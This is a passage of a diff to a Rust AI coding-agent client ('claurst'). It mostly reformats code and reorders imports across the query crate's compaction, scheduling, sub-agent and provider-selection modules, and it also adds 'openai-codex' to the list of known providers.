+                "Sub-agent stopped: budget ${:.4} exceeded (limit ${:.4})",
+                cost_usd, limit_usd
+            )),
         }
     }
 }
@@ -486,13 +480,18 @@ impl Tool for AgentTool {
 fn format_outcome(outcome: QueryOutcome) -> String {
     match outcome {
         QueryOutcome::EndTurn { message, .. } => message.get_all_text(),
-        QueryOutcome::MaxTokens { partial_message, .. } => format!(
+        QueryOutcome::MaxTokens {
+            partial_message, ..
+        } => format!(
             "{}\n\n[Note: Agent hit max_tokens limit]",
             partial_message.get_all_text()
         ),
         QueryOutcome::Cancelled => "[Agent was cancelled]".to_string(),
         QueryOutcome::Error(e) => format!("[Agent error: {}]", e),
-        QueryOutcome::BudgetExceeded { cost_usd, limit_usd } => format!(
+        QueryOutcome::BudgetExceeded {
+            cost_usd,
+            limit_usd,
+        } => format!(
             "[Agent stopped: budget ${:.4} exceeded (limit ${:.4})]",
             cost_usd, limit_usd
         ),
@@ -538,18 +537,19 @@ pub fn init_team_swarm_runner() {
                     }
                 };
 
-                let client = match claurst_api::AnthropicClient::new(claurst_api::client::ClientConfig {
-                    api_key,
-                    ..Default::default()
-                }) {
-                    Ok(c) => Arc::new(c),
-                    Err(e) => {
-                        return format!(
-                            "[Agent '{}' failed to create client: {}]",
-                            description, e
-                        )
-                    }
-                };
+                let client =
+                    match claurst_api::AnthropicClient::new(claurst_api::client::ClientConfig {
+                        api_key,
+                        ..Default::default()
+                    }) {
+                        Ok(c) => Arc::new(c),
+                        Err(e) => {
+                            return format!(
+                                "[Agent '{}' failed to create client: {}]",
+                                description, e
+                            )
+                        }
+                    };
 
                 // Build the tool list, filtering to the allowlist if provided.
                 let all = claurst_tools::all_tools();

--- a/src-rust/crates/query/src/auto_dream.rs
+++ b/src-rust/crates/query/src/auto_dream.rs
@@ -8,11 +8,11 @@
 //!   2. Sessions: transcript count with mtime > last_consolidated_at >= min_sessions
 //!   3. Lock:     no other process mid-consolidation (stale after 1 hour)
 
+use anyhow::Result;
+use serde::{Deserialize, Serialize};
 use std::path::PathBuf;
 use std::time::{Duration, SystemTime, UNIX_EPOCH};
 use tokio::fs;
-use anyhow::Result;
-use serde::{Deserialize, Serialize};
 
 // Scan throttle: when time-gate passes but session-gate doesn't, the lock
 // mtime doesn't advance, so the time-gate keeps passing every turn.
@@ -374,14 +374,20 @@ mod tests {
         let tmp = TempDir::new().unwrap();
         let dream = make_dream(&tmp);
         let state = ConsolidationState::default();
-        assert!(dream.time_gate_passes(&state), "no prior consolidation → gate passes");
+        assert!(
+            dream.time_gate_passes(&state),
+            "no prior consolidation → gate passes"
+        );
     }
 
     #[test]
     fn test_time_gate_recent_consolidation() {
         let tmp = TempDir::new().unwrap();
         let dream = AutoDream::with_config(
-            AutoDreamConfig { min_hours: 24.0, min_sessions: 5 },
+            AutoDreamConfig {
+                min_hours: 24.0,
+                min_sessions: 5,
+            },
             tmp.path().join("memory"),
             tmp.path().join("conversations"),
         );
@@ -389,14 +395,20 @@ mod tests {
             last_consolidated_at: Some(now_secs()), // just now
             lock_etag: None,
         };
-        assert!(!dream.time_gate_passes(&state), "just consolidated → gate blocked");
+        assert!(
+            !dream.time_gate_passes(&state),
+            "just consolidated → gate blocked"
+        );
     }
 
     #[test]
     fn test_time_gate_old_consolidation() {
         let tmp = TempDir::new().unwrap();
         let dream = AutoDream::with_config(
-            AutoDreamConfig { min_hours: 24.0, min_sessions: 5 },
+            AutoDreamConfig {
+                min_hours: 24.0,
+                min_sessions: 5,
+            },
             tmp.path().join("memory"),
             tmp.path().join("conversations"),
         );
@@ -406,7 +418,10 @@ mod tests {
             last_consolidated_at: Some(old),
             lock_etag: None,
         };
-        assert!(dream.time_gate_passes(&state), "consolidated 25h ago → gate passes");
+        assert!(
+            dream.time_gate_passes(&state),
+            "consolidated 25h ago → gate passes"
+        );
     }
 
     // --- lock_gate_passes (sync-friendly via tokio::test) ---

--- a/src-rust/crates/query/src/away_summary.rs
+++ b/src-rust/crates/query/src/away_summary.rs
@@ -86,8 +86,10 @@ pub async fn generate_away_summary(
     conversation.push(Message::user(build_away_summary_prompt()));
 
     // Convert to API messages.
-    let api_messages: Vec<claurst_api::ApiMessage> =
-        conversation.iter().map(claurst_api::ApiMessage::from).collect();
+    let api_messages: Vec<claurst_api::ApiMessage> = conversation
+        .iter()
+        .map(claurst_api::ApiMessage::from)
+        .collect();
 
     let request = CreateMessageRequest::builder(&config.model, config.max_tokens)
         .messages(api_messages)
@@ -133,7 +135,10 @@ mod tests {
     #[test]
     fn default_config_uses_haiku() {
         let cfg = AwaySummaryConfig::default();
-        assert!(cfg.model.contains("haiku"), "default model should be a Haiku variant");
+        assert!(
+            cfg.model.contains("haiku"),
+            "default model should be a Haiku variant"
+        );
         assert_eq!(cfg.max_tokens, 300);
     }
 

--- a/src-rust/crates/query/src/command_queue.rs
+++ b/src-rust/crates/query/src/command_queue.rs
@@ -111,7 +111,11 @@ impl CommandQueue {
             .unwrap_or_default()
             .as_millis() as u64;
         let mut heap = self.0.lock().unwrap();
-        heap.push(QueueEntry { command, priority, timestamp: ts });
+        heap.push(QueueEntry {
+            command,
+            priority,
+            timestamp: ts,
+        });
     }
 
     /// Drain all pending commands in priority order (highest first).

--- a/src-rust/crates/query/src/compact.rs
+++ b/src-rust/crates/query/src/compact.rs
@@ -20,7 +20,10 @@
 //   the most recent `keep_recent_messages` intact.  This is lighter than a
 //   full compaction and can fire proactively at 75 % capacity.
 
-use claurst_api::{AnthropicStreamEvent, ApiMessage, CreateMessageRequest, StreamAccumulator, StreamHandler, SystemPrompt};
+use claurst_api::{
+    AnthropicStreamEvent, ApiMessage, CreateMessageRequest, StreamAccumulator, StreamHandler,
+    SystemPrompt,
+};
 use claurst_core::error::ClaudeError;
 use claurst_core::types::{ContentBlock, Message, MessageContent, Role};
 use serde_json::Value;
@@ -48,8 +51,8 @@ const KEEP_RECENT_MESSAGES: usize = 10;
 const MAX_CONSECUTIVE_FAILURES: u32 = 3;
 
 // Percentage thresholds for token warning states (mirrors TS autoCompact.ts)
-const WARNING_PCT: f64 = 0.80;   // 80 % full → yellow warning
-const CRITICAL_PCT: f64 = 0.95;  // 95 % full → red critical
+const WARNING_PCT: f64 = 0.80; // 80 % full → yellow warning
+const CRITICAL_PCT: f64 = 0.95; // 95 % full → red critical
 
 // ---------------------------------------------------------------------------
 // Public types
@@ -121,7 +124,11 @@ impl MessageGroup {
     fn from_messages(messages: Vec<Message>) -> Self {
         let topic_hint = extract_topic_hint(&messages);
         let token_estimate = estimate_tokens_for_messages(&messages);
-        Self { messages, topic_hint, token_estimate }
+        Self {
+            messages,
+            topic_hint,
+            token_estimate,
+        }
     }
 }
 
@@ -160,10 +167,7 @@ fn estimate_tokens_for_messages(messages: &[Message]) -> usize {
         .iter()
         .map(|m| match &m.content {
             MessageContent::Text(t) => t.len(),
-            MessageContent::Blocks(blocks) => blocks
-                .iter()
-                .map(|b| estimate_block_chars(b))
-                .sum(),
+            MessageContent::Blocks(blocks) => blocks.iter().map(|b| estimate_block_chars(b)).sum(),
         })
         .sum();
     // chars / 4 = rough tokens, then * 4/3 padding
@@ -173,9 +177,7 @@ fn estimate_tokens_for_messages(messages: &[Message]) -> usize {
 fn estimate_block_chars(block: &ContentBlock) -> usize {
     match block {
         ContentBlock::Text { text } => text.len(),
-        ContentBlock::ToolUse { name, input, .. } => {
-            name.len() + input.to_string().len()
-        }
+        ContentBlock::ToolUse { name, input, .. } => name.len() + input.to_string().len(),
         ContentBlock::ToolResult { content, .. } => match content {
             claurst_core::types::ToolResultContent::Text(t) => t.len(),
             claurst_core::types::ToolResultContent::Blocks(blocks) => {
@@ -318,7 +320,8 @@ const NO_TOOLS_PREAMBLE: &str = "CRITICAL: Respond with TEXT ONLY. Do NOT call a
 \n";
 
 /// The trailing reminder that reinforces the no-tools instruction.
-const NO_TOOLS_TRAILER: &str = "\n\nREMINDER: Do NOT call any tools. Respond with plain text only — \
+const NO_TOOLS_TRAILER: &str =
+    "\n\nREMINDER: Do NOT call any tools. Respond with plain text only — \
 an <analysis> block followed by a <summary> block. \
 Tool calls will be rejected and you will fail the task.";
 
@@ -508,7 +511,9 @@ pub fn calculate_token_warning_state(input_tokens: u64, model: &str) -> TokenWar
 
     if pct >= CRITICAL_PCT {
         TokenWarningState::Critical
-    } else if pct >= WARNING_PCT || window.saturating_sub(input_tokens) <= WARNING_THRESHOLD_BUFFER_TOKENS {
+    } else if pct >= WARNING_PCT
+        || window.saturating_sub(input_tokens) <= WARNING_THRESHOLD_BUFFER_TOKENS
+    {
         TokenWarningState::Warning
     } else {
         TokenWarningState::Ok
@@ -569,12 +574,24 @@ async fn summarise_head(
                             name, id, input
                         ));
                     }
-                    ContentBlock::ToolResult { tool_use_id, content, is_error } => {
+                    ContentBlock::ToolResult {
+                        tool_use_id,
+                        content,
+                        is_error,
+                    } => {
                         let result_text = match content {
-                            claurst_core::types::ToolResultContent::Text(t) => t.as_str().to_string(),
-                            claurst_core::types::ToolResultContent::Blocks(_) => "[complex content]".to_string(),
+                            claurst_core::types::ToolResultContent::Text(t) => {
+                                t.as_str().to_string()
+                            }
+                            claurst_core::types::ToolResultContent::Blocks(_) => {
+                                "[complex content]".to_string()
+                            }
                         };
-                        let error_flag = if is_error.unwrap_or(false) { " [ERROR]" } else { "" };
+                        let error_flag = if is_error.unwrap_or(false) {
+                            " [ERROR]"
+                        } else {
+                            ""
+                        };
                         transcript.push_str(&format!(
                             "[Tool Result (id={}){}]\n{}\n\n",
                             tool_use_id, error_flag, result_text
@@ -657,10 +674,7 @@ pub async fn compact_conversation(
     let total = messages.len();
 
     if total <= KEEP_RECENT_MESSAGES + 1 {
-        debug!(
-            total,
-            "Too few messages to compact – keeping everything"
-        );
+        debug!(total, "Too few messages to compact – keeping everything");
         return Ok(messages.to_vec());
     }
 
@@ -738,7 +752,10 @@ pub async fn auto_compact_if_needed(
 #[derive(Debug, Clone)]
 pub enum CompactTrigger {
     /// Normal 90 %-threshold compact.
-    TokenThreshold { tokens_used: u64, context_limit: u64 },
+    TokenThreshold {
+        tokens_used: u64,
+        context_limit: u64,
+    },
     /// Caller requested an unconditional compact.
     Forced,
 }
@@ -787,7 +804,10 @@ pub fn should_context_collapse(tokens_used: u64, context_limit: u64) -> bool {
 /// Returns `(new_messages, rough_tokens_freed)`.
 ///
 /// Mirrors `snipCompact` from TypeScript (no API call required — purely local).
-pub fn snip_compact(messages: Vec<claurst_core::types::Message>, keep_n_newest: usize) -> (Vec<claurst_core::types::Message>, u64) {
+pub fn snip_compact(
+    messages: Vec<claurst_core::types::Message>,
+    keep_n_newest: usize,
+) -> (Vec<claurst_core::types::Message>, u64) {
     let total = messages.len();
     if total <= keep_n_newest + 1 {
         // Nothing to snip.
@@ -803,8 +823,7 @@ pub fn snip_compact(messages: Vec<claurst_core::types::Message>, keep_n_newest: 
     }
 
     // Estimate how many tokens the snipped range held.
-    let snipped_tokens =
-        estimate_tokens_for_messages(&messages[snip_start..snip_end]) as u64;
+    let snipped_tokens = estimate_tokens_for_messages(&messages[snip_start..snip_end]) as u64;
 
     let mut result = Vec::with_capacity(1 + keep_n_newest);
     result.push(messages[0].clone());
@@ -819,7 +838,10 @@ pub fn snip_compact(messages: Vec<claurst_core::types::Message>, keep_n_newest: 
 /// Returns the cut index (0 = keep everything, messages.len() = keep nothing).
 /// Iterates from the newest message backwards, accumulating token estimates
 /// until the budget is exhausted.
-pub fn calculate_messages_to_keep_index(messages: &[claurst_core::types::Message], token_budget: u64) -> usize {
+pub fn calculate_messages_to_keep_index(
+    messages: &[claurst_core::types::Message],
+    token_budget: u64,
+) -> usize {
     if messages.is_empty() {
         return 0;
     }
@@ -857,7 +879,8 @@ fn strip_images(messages: Vec<claurst_core::types::Message>) -> Vec<claurst_core
                 // If stripping left only an empty block list, collapse to a
                 // placeholder text so the conversation remains parseable.
                 if blocks.is_empty() {
-                    msg.content = MessageContent::Text("[image removed for compaction]".to_string());
+                    msg.content =
+                        MessageContent::Text("[image removed for compaction]".to_string());
                 }
             }
             msg
@@ -908,8 +931,7 @@ pub async fn reactive_compact(
         });
     }
 
-    let original_token_estimate =
-        estimate_tokens_for_messages(&stripped[..split_at]) as u64;
+    let original_token_estimate = estimate_tokens_for_messages(&stripped[..split_at]) as u64;
 
     let mut new_messages =
         summarise_head(client, &stripped, split_at, &config.model, 20_000).await?;
@@ -967,7 +989,10 @@ pub async fn context_collapse(
     client: &claurst_api::AnthropicClient,
     config: &crate::QueryConfig,
 ) -> Result<CompactResult, claurst_core::error::ClaudeError> {
-    use claurst_api::{AnthropicStreamEvent, ApiMessage, CreateMessageRequest, StreamAccumulator, StreamHandler, SystemPrompt};
+    use claurst_api::{
+        AnthropicStreamEvent, ApiMessage, CreateMessageRequest, StreamAccumulator, StreamHandler,
+        SystemPrompt,
+    };
     use serde_json::Value;
     use std::sync::Arc;
 
@@ -1083,7 +1108,9 @@ const CONTEXT_COLLAPSE_THRESHOLD: f64 = 0.97;
 ///
 /// When the same file is read more than once in the conversation, replaces
 /// all but the last read with `[Content shown N time(s); showing last occurrence only]`.
-pub fn collapse_read_tool_results(messages: Vec<claurst_core::types::Message>) -> Vec<claurst_core::types::Message> {
+pub fn collapse_read_tool_results(
+    messages: Vec<claurst_core::types::Message>,
+) -> Vec<claurst_core::types::Message> {
     use claurst_core::types::{ContentBlock, MessageContent, ToolResultContent};
     use std::collections::HashMap;
 
@@ -1143,7 +1170,9 @@ pub fn collapse_read_tool_results(messages: Vec<claurst_core::types::Message>) -
 ///
 /// If the same search was run more than once (same query), keep only the
 /// most recent result; replace earlier results with a truncation notice.
-pub fn collapse_search_results(messages: Vec<claurst_core::types::Message>) -> Vec<claurst_core::types::Message> {
+pub fn collapse_search_results(
+    messages: Vec<claurst_core::types::Message>,
+) -> Vec<claurst_core::types::Message> {
     use claurst_core::types::{ContentBlock, MessageContent, ToolResultContent};
     use std::collections::HashSet;
 

--- a/src-rust/crates/query/src/context_analyzer.rs
+++ b/src-rust/crates/query/src/context_analyzer.rs
@@ -69,7 +69,10 @@ pub enum CompactionStrategy {
     /// Full history compaction — all messages summarised.
     FullCompact { expected_reduction_pct: f64 },
     /// Partial compaction — only oldest N messages.
-    PartialCompact { messages_to_compact: usize, expected_reduction_pct: f64 },
+    PartialCompact {
+        messages_to_compact: usize,
+        expected_reduction_pct: f64,
+    },
     /// Collapse repeated file reads.
     CollapseReads { expected_reduction_pct: f64 },
     /// Nothing needed.
@@ -87,8 +90,9 @@ fn estimate_chars(s: &str) -> u64 {
 fn content_tokens(content: &MessageContent) -> u64 {
     match content {
         MessageContent::Text(s) => estimate_chars(s),
-        MessageContent::Blocks(blocks) => {
-            blocks.iter().map(|b| match b {
+        MessageContent::Blocks(blocks) => blocks
+            .iter()
+            .map(|b| match b {
                 ContentBlock::Text { text } => estimate_chars(text),
                 ContentBlock::Thinking { thinking, .. } => estimate_chars(thinking),
                 ContentBlock::ToolUse { name, input, .. } => {
@@ -98,18 +102,21 @@ fn content_tokens(content: &MessageContent) -> u64 {
                     use claurst_core::types::ToolResultContent;
                     match content {
                         ToolResultContent::Text(t) => estimate_chars(t),
-                        ToolResultContent::Blocks(inner) => inner.iter().map(|ib| {
-                            if let ContentBlock::Text { text } = ib {
-                                estimate_chars(text)
-                            } else {
-                                10
-                            }
-                        }).sum(),
+                        ToolResultContent::Blocks(inner) => inner
+                            .iter()
+                            .map(|ib| {
+                                if let ContentBlock::Text { text } = ib {
+                                    estimate_chars(text)
+                                } else {
+                                    10
+                                }
+                            })
+                            .sum(),
                     }
                 }
                 _ => 10,
-            }).sum()
-        }
+            })
+            .sum(),
     }
 }
 
@@ -217,8 +224,14 @@ pub fn suggest_compaction(analysis: &ContextAnalysis, context_limit: u64) -> Com
 pub fn format_ctx_viz(analysis: &ContextAnalysis, context_limit: u64) -> String {
     let categories = [
         (ContextCategory::SystemPrompt, analysis.system_prompt_tokens),
-        (ContextCategory::ToolDefinitions, analysis.tool_definitions_tokens),
-        (ContextCategory::ConversationHistory, analysis.conversation_history_tokens),
+        (
+            ContextCategory::ToolDefinitions,
+            analysis.tool_definitions_tokens,
+        ),
+        (
+            ContextCategory::ConversationHistory,
+            analysis.conversation_history_tokens,
+        ),
         (ContextCategory::ToolResults, analysis.tool_results_tokens),
         (ContextCategory::Attachments, analysis.attachments_tokens),
     ];

--- a/src-rust/crates/query/src/coordinator.rs
+++ b/src-rust/crates/query/src/coordinator.rs
@@ -179,10 +179,7 @@ pub fn coordinator_user_context(available_tools: &[String], mcp_servers: &[Strin
         format!("\nConnected MCP servers: {}", mcp_servers.join(", "))
     };
 
-    format!(
-        "Available worker tools: {}{}\n",
-        tool_list, mcp_section
-    )
+    format!("Available worker tools: {}{}\n", tool_list, mcp_section)
 }
 
 /// Check if the current runtime coordinator flag matches `stored_coordinator`.
@@ -329,11 +326,20 @@ mod tests {
     #[test]
     fn test_scratchpad_gate_blocks_write_until_unlocked() {
         let mut gate = ScratchpadGate::with_signal("SCRATCHPAD_READY");
-        assert!(!gate.check("Write"), "Write should be blocked before unlock");
-        assert!(!gate.check("FileWrite"), "FileWrite should be blocked before unlock");
+        assert!(
+            !gate.check("Write"),
+            "Write should be blocked before unlock"
+        );
+        assert!(
+            !gate.check("FileWrite"),
+            "FileWrite should be blocked before unlock"
+        );
         gate.try_unlock("Some content SCRATCHPAD_READY here");
         assert!(gate.check("Write"), "Write should be allowed after unlock");
-        assert!(gate.check("FileWrite"), "FileWrite should be allowed after unlock");
+        assert!(
+            gate.check("FileWrite"),
+            "FileWrite should be allowed after unlock"
+        );
     }
 
     #[test]

--- a/src-rust/crates/query/src/cron_scheduler.rs
+++ b/src-rust/crates/query/src/cron_scheduler.rs
@@ -8,13 +8,13 @@
 // One-shot tasks (recurring=false) are automatically removed from the store
 // by `pop_due_tasks` after they are returned.
 
-use crate::{QueryConfig, QueryOutcome, run_query_loop};
+use crate::{run_query_loop, QueryConfig, QueryOutcome};
+use chrono::Timelike;
 use claurst_core::types::Message;
 use claurst_tools::Tool;
 use claurst_tools::ToolContext;
-use chrono::Timelike;
 use std::sync::Arc;
-use tokio::time::{Duration, sleep};
+use tokio::time::{sleep, Duration};
 use tokio_util::sync::CancellationToken;
 use tracing::{debug, error, info};
 
@@ -108,7 +108,10 @@ async fn run_scheduler_loop(
                     QueryOutcome::Cancelled => {
                         debug!(id = %task_id, "Cron task cancelled");
                     }
-                    QueryOutcome::BudgetExceeded { cost_usd, limit_usd } => {
+                    QueryOutcome::BudgetExceeded {
+                        cost_usd,
+                        limit_usd,
+                    } => {
                         eprintln!(
                             "[cron] task {} budget exceeded: spent ${:.4} of ${:.4}",
                             task_id, cost_usd, limit_usd

--- a/src-rust/crates/query/src/lib.rs
+++ b/src-rust/crates/query/src/lib.rs
@@ -18,25 +18,25 @@ pub mod coordinator;
 pub mod cron_scheduler;
 pub mod session_memory;
 pub mod skill_prefetch;
-pub use agent_tool::{AgentTool, init_team_swarm_runner};
-pub use command_queue::{CommandPriority, CommandQueue, QueuedCommand, drain_command_queue};
-pub use cron_scheduler::start_cron_scheduler;
-pub use skill_prefetch::{
-    SkillDefinition, SkillIndex, SharedSkillIndex, prefetch_skills, format_skill_listing,
-};
+pub use agent_tool::{init_team_swarm_runner, AgentTool};
+pub use command_queue::{drain_command_queue, CommandPriority, CommandQueue, QueuedCommand};
 pub use compact::{
-    AutoCompactState, CompactResult, CompactTrigger, MicroCompactConfig, MessageGroup, TokenWarningState,
     auto_compact_if_needed, calculate_messages_to_keep_index, calculate_token_warning_state,
     compact_conversation, context_collapse, context_window_for_model, format_compact_summary,
-    get_compact_prompt, group_messages_for_compact, micro_compact_if_needed,
-    reactive_compact, should_auto_compact, should_compact, should_context_collapse, snip_compact,
+    get_compact_prompt, group_messages_for_compact, micro_compact_if_needed, reactive_compact,
+    should_auto_compact, should_compact, should_context_collapse, snip_compact, AutoCompactState,
+    CompactResult, CompactTrigger, MessageGroup, MicroCompactConfig, TokenWarningState,
 };
+pub use cron_scheduler::start_cron_scheduler;
 pub use session_memory::{
     ExtractedMemory, MemoryCategory, SessionMemoryExtractor, SessionMemoryState,
 };
+pub use skill_prefetch::{
+    format_skill_listing, prefetch_skills, SharedSkillIndex, SkillDefinition, SkillIndex,
+};
 
 use claurst_api::{
-    ApiMessage, ApiToolDefinition, AnthropicStreamEvent, CreateMessageRequest, StreamAccumulator,
+    AnthropicStreamEvent, ApiMessage, ApiToolDefinition, CreateMessageRequest, StreamAccumulator,
     StreamHandler, SystemPrompt, ThinkingConfig,
 };
 use claurst_core::config::Config;
@@ -59,7 +59,10 @@ pub enum QueryOutcome {
     /// The model finished its turn (end_turn stop reason).
     EndTurn { message: Message, usage: UsageInfo },
     /// The model hit max_tokens.
-    MaxTokens { partial_message: Message, usage: UsageInfo },
+    MaxTokens {
+        partial_message: Message,
+        usage: UsageInfo,
+    },
     /// The conversation was cancelled by the user.
     Cancelled,
     /// An unrecoverable error occurred.
@@ -157,10 +160,7 @@ impl QueryConfig {
             max_tokens: cfg.effective_max_tokens(),
             output_style: cfg.effective_output_style(),
             output_style_prompt: cfg.resolve_output_style_prompt(),
-            working_directory: cfg
-                .project_dir
-                .as_ref()
-                .map(|p| p.display().to_string()),
+            working_directory: cfg.project_dir.as_ref().map(|p| p.display().to_string()),
             ..Default::default()
         }
     }
@@ -177,24 +177,17 @@ impl QueryConfig {
             max_tokens: cfg.effective_max_tokens(),
             output_style: cfg.effective_output_style(),
             output_style_prompt: cfg.resolve_output_style_prompt(),
-            working_directory: cfg
-                .project_dir
-                .as_ref()
-                .map(|p| p.display().to_string()),
+            working_directory: cfg.project_dir.as_ref().map(|p| p.display().to_string()),
             ..Default::default()
         }
     }
 }
 
-fn reasoning_effort_for_level(
-    effort_level: claurst_core::effort::EffortLevel,
-) -> &'static str {
+fn reasoning_effort_for_level(effort_level: claurst_core::effort::EffortLevel) -> &'static str {
     match effort_level {
         claurst_core::effort::EffortLevel::Low => "low",
         claurst_core::effort::EffortLevel::Medium => "medium",
-        claurst_core::effort::EffortLevel::High | claurst_core::effort::EffortLevel::Max => {
-            "high"
-        }
+        claurst_core::effort::EffortLevel::High | claurst_core::effort::EffortLevel::Max => "high",
     }
 }
 
@@ -204,9 +197,7 @@ fn google_thinking_level_for_effort(
     match effort_level.unwrap_or(claurst_core::effort::EffortLevel::High) {
         claurst_core::effort::EffortLevel::Low => "low",
         claurst_core::effort::EffortLevel::Medium => "medium",
-        claurst_core::effort::EffortLevel::High | claurst_core::effort::EffortLevel::Max => {
-            "high"
-        }
+        claurst_core::effort::EffortLevel::High | claurst_core::effort::EffortLevel::Max => "high",
     }
 }
 
@@ -283,10 +274,7 @@ fn build_provider_options(
                 "reasoningEffort".to_string(),
                 serde_json::json!(reasoning_effort),
             );
-            options.insert(
-                "reasoningSummary".to_string(),
-                serde_json::json!("auto"),
-            );
+            options.insert("reasoningSummary".to_string(), serde_json::json!("auto"));
             options.insert(
                 "include".to_string(),
                 serde_json::json!(["reasoning.encrypted_content"]),
@@ -296,10 +284,7 @@ fn build_provider_options(
                 && !model_id.contains("codex")
                 && !model_id.contains("-chat")
             {
-                options.insert(
-                    "textVerbosity".to_string(),
-                    serde_json::json!("low"),
-                );
+                options.insert("textVerbosity".to_string(), serde_json::json!("low"));
             }
         }
     }
@@ -363,10 +348,7 @@ fn build_provider_options(
             && !model_id.contains("-chat")
             && provider_id != "azure"
         {
-            options.insert(
-                "textVerbosity".to_string(),
-                serde_json::json!("low"),
-            );
+            options.insert("textVerbosity".to_string(), serde_json::json!("low"));
         }
     }
 
@@ -380,9 +362,7 @@ fn build_provider_options(
         }
     }
 
-    if provider_id == "qwen"
-        && thinking_budget.is_some()
-        && !model_id.contains("kimi-k2-thinking")
+    if provider_id == "qwen" && thinking_budget.is_some() && !model_id.contains("kimi-k2-thinking")
     {
         options.insert("enable_thinking".to_string(), serde_json::json!(true));
     }
@@ -410,11 +390,24 @@ pub enum QueryEvent {
     /// A stream event from the API.
     Stream(AnthropicStreamEvent),
     /// A tool is about to be executed.
-    ToolStart { tool_name: String, tool_id: String, input_json: String },
+    ToolStart {
+        tool_name: String,
+        tool_id: String,
+        input_json: String,
+    },
     /// A tool has finished executing.
-    ToolEnd { tool_name: String, tool_id: String, result: String, is_error: bool },
+    ToolEnd {
+        tool_name: String,
+        tool_id: String,
+        result: String,
+        is_error: bool,
+    },
     /// The model finished a turn.
-    TurnComplete { turn: u32, stop_reason: String, usage: Option<UsageInfo> },
+    TurnComplete {
+        turn: u32,
+        stop_reason: String,
+        usage: Option<UsageInfo>,
+    },
     /// An informational status message.
     Status(String),
     /// An error.
@@ -422,7 +415,10 @@ pub enum QueryEvent {
     /// Token usage has crossed a warning threshold.
     /// `state` is Warning (≥ 80 %) or Critical (≥ 95 %).
     /// `pct_used` is the fraction of the context window consumed (0.0–1.0).
-    TokenWarning { state: TokenWarningState, pct_used: f64 },
+    TokenWarning {
+        state: TokenWarningState,
+        pct_used: f64,
+    },
 }
 
 // ---------------------------------------------------------------------------
@@ -486,7 +482,11 @@ pub fn fire_post_sampling_hooks(
 
         let stderr = String::from_utf8_lossy(&output.stderr).into_owned();
         let stdout = String::from_utf8_lossy(&output.stdout).into_owned();
-        let body = if !stderr.trim().is_empty() { stderr } else { stdout };
+        let body = if !stderr.trim().is_empty() {
+            stderr
+        } else {
+            stdout
+        };
 
         tracing::warn!(
             command = %entry.command,
@@ -569,9 +569,16 @@ fn total_tool_result_chars(messages: &[Message]) -> usize {
             if let ContentBlock::ToolResult { content, .. } = b {
                 Some(match content {
                     ToolResultContent::Text(t) => t.len(),
-                    ToolResultContent::Blocks(blocks) => blocks.iter().map(|b| {
-                        if let ContentBlock::Text { text } = b { text.len() } else { 0 }
-                    }).sum(),
+                    ToolResultContent::Blocks(blocks) => blocks
+                        .iter()
+                        .map(|b| {
+                            if let ContentBlock::Text { text } = b {
+                                text.len()
+                            } else {
+                                0
+                            }
+                        })
+                        .sum(),
                 })
             } else {
                 None
@@ -611,16 +618,22 @@ fn apply_tool_result_budget(messages: Vec<Message>, budget: usize) -> (Vec<Messa
             if let ContentBlock::ToolResult { content, .. } = block {
                 let size = match &*content {
                     ToolResultContent::Text(t) => t.len(),
-                    ToolResultContent::Blocks(inner) => inner.iter().map(|b| {
-                        if let ContentBlock::Text { text } = b { text.len() } else { 0 }
-                    }).sum(),
+                    ToolResultContent::Blocks(inner) => inner
+                        .iter()
+                        .map(|b| {
+                            if let ContentBlock::Text { text } = b {
+                                text.len()
+                            } else {
+                                0
+                            }
+                        })
+                        .sum(),
                 };
                 if size == 0 {
                     continue;
                 }
-                *content = ToolResultContent::Text(
-                    "[tool result truncated to save context]".to_string(),
-                );
+                *content =
+                    ToolResultContent::Text("[tool result truncated to save context]".to_string());
                 truncated += 1;
                 if size > to_shed {
                     break 'outer;
@@ -685,7 +698,8 @@ pub async fn run_query_loop(
     let mut retries_left: u32 = 2;
 
     // If an agent defines a max_turns override, respect it (agent wins over config).
-    let effective_max_turns = config.agent_definition
+    let effective_max_turns = config
+        .agent_definition
         .as_ref()
         .and_then(|a| a.max_turns)
         .unwrap_or(config.max_turns);
@@ -828,15 +842,16 @@ pub async fn run_query_loop(
 
         // Apply temperature: explicit config value takes precedence, then agent override,
         // then effort-level override.
-        let effective_temperature = config.temperature
+        let effective_temperature = config
+            .temperature
             .or_else(|| {
-                config.agent_definition.as_ref()
+                config
+                    .agent_definition
+                    .as_ref()
                     .and_then(|a| a.temperature)
                     .map(|t| t as f32)
             })
-            .or_else(|| {
-                config.effort_level.and_then(|el| el.temperature())
-            });
+            .or_else(|| config.effort_level.and_then(|el| el.temperature()));
         if let Some(t) = effective_temperature {
             req_builder = req_builder.temperature(t);
         }
@@ -860,7 +875,12 @@ pub async fn run_query_loop(
         //   3. Model registry lookup (e.g. "gemini-3-flash-preview" → google)
         //   4. Default to "anthropic"
         if let Some(ref registry) = config.provider_registry {
-            let (provider_id_str, model_id_str) = if let Some(p) = tool_ctx.config.provider.as_deref().filter(|p| *p != "anthropic") {
+            let (provider_id_str, model_id_str) = if let Some(p) = tool_ctx
+                .config
+                .provider
+                .as_deref()
+                .filter(|p| *p != "anthropic")
+            {
                 // Explicit non-Anthropic provider in config — use it.
                 // If the stored model is in canonical "provider/model" form,
                 // strip the top-level provider prefix before sending it to the
@@ -877,19 +897,40 @@ pub async fn run_query_loop(
                 // Check whether `p` is a known provider or just a model
                 // namespace (e.g. "meta-llama/Llama-3" on OpenRouter).
                 let known_providers = [
-                    "anthropic", "openai", "google", "groq", "mistral",
-                    "deepseek", "xai", "cohere", "perplexity", "cerebras",
-                    "openrouter", "togetherai", "together-ai", "deepinfra",
-                    "venice", "github-copilot", "ollama", "lmstudio",
-                    "llamacpp", "azure", "amazon-bedrock", "huggingface",
-                    "nvidia", "fireworks", "sambanova",
+                    "anthropic",
+                    "openai",
+                    "openai-codex",
+                    "google",
+                    "groq",
+                    "mistral",
+                    "deepseek",
+                    "xai",
+                    "cohere",
+                    "perplexity",
+                    "cerebras",
+                    "openrouter",
+                    "togetherai",
+                    "together-ai",
+                    "deepinfra",
+                    "venice",
+                    "github-copilot",
+                    "ollama",
+                    "lmstudio",
+                    "llamacpp",
+                    "azure",
+                    "amazon-bedrock",
+                    "huggingface",
+                    "nvidia",
+                    "fireworks",
+                    "sambanova",
                 ];
                 if known_providers.contains(&p) {
                     (p.to_string(), m.to_string())
                 } else {
                     // Treat the whole string as the model ID, fall through
                     // to auto-detection below.
-                    let fallback_provider = tool_ctx.config.provider.as_deref().unwrap_or("anthropic");
+                    let fallback_provider =
+                        tool_ctx.config.provider.as_deref().unwrap_or("anthropic");
                     (fallback_provider.to_string(), effective_model.clone())
                 }
